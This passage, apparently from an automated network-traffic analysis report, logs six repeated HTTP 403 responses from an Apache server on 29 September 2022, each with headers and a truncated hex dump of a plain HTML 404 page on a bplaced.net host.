6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:43 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=88X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:44 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=108X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:45 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=114X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:46 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=108X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:47 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=106X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:48 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=111X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
